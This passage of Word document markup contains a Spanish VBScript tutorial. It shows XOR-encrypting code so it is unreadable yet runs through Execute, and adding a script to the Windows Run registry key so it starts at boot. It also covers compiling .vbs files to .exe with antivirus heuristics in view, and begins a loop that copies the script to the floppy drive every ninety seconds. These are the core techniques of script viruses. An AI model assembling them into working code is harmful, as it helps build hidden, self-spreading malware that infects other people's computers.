        <w:t xml:space="preserve">, y así puede tener muchas mas utilidades. Solo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>depende de tu imaginación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, los usos que se le puede dar a esta función.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="318"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para aclarar un poco mas pongamos otro ejempl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Contenido = "Este es el contenido del MsgBox"</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Titulo = "Este es el Titulo del MsgBox"</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MsgBox = "Variable = MsgBox(VarContenido,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>324,VarTitulo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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xecute VarMsgBox</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Esta es una forma de ejecutar un MsgBox con la función Execute. Que el mensaje y el titulo estén en variables aparte se debe mas que nada a la comodidad, ya que recordad que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">si queremos escribir comillas como parte de la cadena </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de VarMsgBox, debemos hacerlo con "&amp;</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 xml:space="preserve">34)&amp;" utilizando las constantes de cadena. Este código tiene el mismo efecto que si ejecutamos el contenido de VarMsgBox sin la función execute. Para apreciar el verdadero efecto de esta función pongo el siguiente ejemplo que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hace lo mismo que el ejemplo anterior</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pero esta vez con la función encriptadora:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6394" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6394"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="3092"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="639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Function encriptar(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>texto,clave</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="287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On error resume </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>next:Err.Clear</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> For i = 1 To Len(texto)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="66"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encriptar = encriptar &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Chr(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Asc(Mid(texto,i, 1)) Xor clave) Next</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="256"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End Functio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Contenido = "Este es el contenido del MsgBox"</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Titulo = "Este es el Titulo del MsgBox"</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MsgBox = "^</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>izaijdm(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5(E{oJgp ^izKgf|mfalg$;:&lt;$^iz\a|}dg!" Execute encriptar(VarMsgBox,8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="30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ultimo ejemplo el código que muestra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el MsgBox es ilegible </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y no se entiende, pero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si se ejecuta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esto se debe a que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el contenido estaba encriptado </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con la función de parte posterior utilizando la clave 8. Luego, enviamos a execute el contenido de VarMsgBox, pero antes lo pasamos otra vez por la función encriptar para que la desencripte y de esa forma se pueda ejecutar. Ahora no se le ve mucha utilidad, pero piensa que pasaría si en vez de una función MsgBox, estuviera </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>encriptado un script entero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>...</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cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5398770" cy="5080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="118863" name="Group 118863"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398770" cy="5080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398770" cy="5080"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="134320" name="Shape 134320"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5398770" cy="9144"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5398770" h="9144">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5398770" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5398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863" style="width:425.1pt;height:0.400024pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53987,50">
                <v:shape id="Shape 134321" style="position:absolute;width:53987;height:91;left:0;top:0;" coordsize="5398770,9144" path="m0,0l5398770,0l5398770,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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beis saber también que podemos hacer que un VBScript se ejecute cada vez que se inicia el ordenador. Para ello necesitaremos buscar de entre todas las claves del registro (Registro de Windows) </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>las que tengan las palabras Run, RunOnce, RunServices y RunServicesOnce</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Generalmente la que nos interesa es la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE:</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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"</w:t>
      </w:r>
    </w:p>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Una vez vemos esta clave vemos una lista de programas con un nombre cada una. Estos programas se inician a la par de Windows, y si lo que queremos es ejecutar nuestro vbs, solo tenemos que añadirlo a la lista tal y como están los demás:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>
        <w:ind w:left="71"/>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Ws.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>RegWrite</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Nuestro Programa</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VariableConLaRutaCompleta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, "REG_SZ"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="302"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Con esto, simplemente se iniciará el script con Windows. Además, si no queremos esto, tan solo debemos borrar nuestra clave y dejará de ejecutarse.</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cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5398770" cy="5080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="124230" name="Group 124230"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398770" cy="5080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398770" cy="5080"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="134322" name="Shape 134322"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5398770" cy="9144"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5398770" h="9144">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5398770" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5398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230" style="width:425.1pt;height:0.400024pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53987,50">
                <v:shape id="Shape 134323" style="position:absolute;width:53987;height:91;left:0;top:0;" coordsize="5398770,9144" path="m0,0l5398770,0l5398770,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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 necesario e importante reconocer la amplia compatibilidad que existe en los productos de Microsoft, y en el caso de VBScript también ocurre si lo mezclamos con Visul Básic, porque para los que no lo sepan: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>¡El lenguaje VBScript y el Visual Basic 6.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>0 son compatibl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algo los dos son Visual Basic.... pero esta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>compatibilidad es programando en Visual Basic 6.0, incluyendo comandos VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Pero no programando VBScript e incluyendo códigos de Visual Basic 6.0.</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a forma podemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>compilar un .vbs de forma que adquiera la extensión .exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y su correspondiente icono, para los que lo quieran hacer más bonito. También sirve par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i tienes un Antivirus con la Heuristica o el ScriptBlocking, no tengas que desconectarlo mientras trabajas con tus .vbs y pueda detectar cualquier virus VBScript que venga de fuera</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Otra utilidad es que Visual Basic 6.0 es un potente lenguaje que permite la interacción programa-persona (es decir crea los típicos programas de ventana), y puedes aprovechar que ya sabes muchas funciones que puedes usar ahí. Así </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>puedes aumentar la calidad de tus programas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no tener que estar sacando siempre el ImputBox, sino bonitos formularios con imágenes y demás. Pero esto no es explicar programación en Visual Basic 6, sino como crear un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partir de un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con este programa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="71" w:right="3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eamos un ejemplo, en el que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cada minuto y medio aproximado copiamos nuestro VBScript a la disquetera</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, escrito en VBScript normal:</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lastRenderedPageBreak/>
        <w:t>On Error Resume Next</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Set fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Scripting.FileSystemObject")</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Do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="93" w:right="6402"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>bucle= bucle + 1 If bucle = 90000 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="93" w:right="4141"/>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fso.CopyFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
